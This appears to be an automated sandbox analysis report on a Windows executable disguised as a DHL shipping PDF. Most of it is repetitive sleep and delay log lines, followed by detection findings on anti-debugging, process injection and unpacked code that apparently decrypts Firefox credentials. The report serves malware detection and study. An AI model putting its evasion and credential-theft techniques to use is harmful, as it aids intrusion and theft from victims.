                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596968Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596722Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596593Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596374Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596265Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595828Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595718Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595609Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595499Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595390Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595281Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595171Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595062Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594952Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594833Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594696Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594578Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594468Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594355Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594070Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 593815Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 593646Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 593515Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 593405Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeWindow / User API: threadDelayed 995Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeWindow / User API: threadDelayed 979Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeWindow / User API: threadDelayed 3478Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeWindow / User API: threadDelayed 6350Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6952Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6952Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6952Thread sleep time: -239890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6952Thread sleep time: -239781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6952Thread sleep time: -239671s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6952Thread sleep time: -239562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6952Thread sleep time: -239453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6952Thread sleep time: -239344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6952Thread sleep time: -239233s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6952Thread sleep time: -239063s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6952Thread sleep time: -238952s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6952Thread sleep time: -238843s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6952Thread sleep time: -238632s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6896Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep count: 32 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6372Thread sleep count: 3478 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6372Thread sleep count: 6350 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -599714s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -599593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -599483s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -599374s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -599265s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -599156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -599046s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598937s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598609s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598499s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598390s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598281s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598171s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598062s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -597953s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -597843s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -597734s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -597624s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -597515s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -597406s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -597296s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -597187s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -596968s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -596722s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -596593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -596484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -596374s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -596265s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -596156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -596046s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595937s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595609s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595499s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595390s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595281s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595171s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595062s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -594952s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -594833s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -594696s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -594578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -594468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -594355s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -594070s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -593815s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -593646s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -593515s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -593405s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 240000Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239890Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239781Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239671Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239562Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239453Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239344Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239233Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239063Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 238952Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 238843Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 238632Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599714Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599593Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599483Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599374Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599265Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599156Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599046Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598937Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598828Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598718Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598609Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598499Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598390Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598281Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598171Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598062Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597953Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597843Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597734Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597624Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597515Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597406Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597296Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597187Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596968Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596722Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596593Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596374Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596265Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595828Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595718Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595609Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595499Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595390Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595281Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595171Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595062Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594952Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594833Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594696Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594578Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594468Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594355Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594070Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 593815Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 593646Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 593515Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 593405Jump to behavior
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1107898524.00000000046F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: oixmnVMciL
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3536090999.00000000010A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB1A98 CheckRemoteDebuggerPresent,0_2_02DB1A98
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0104C168 LdrInitializeThunk,LdrInitializeThunk,2_2_0104C168
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory written: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
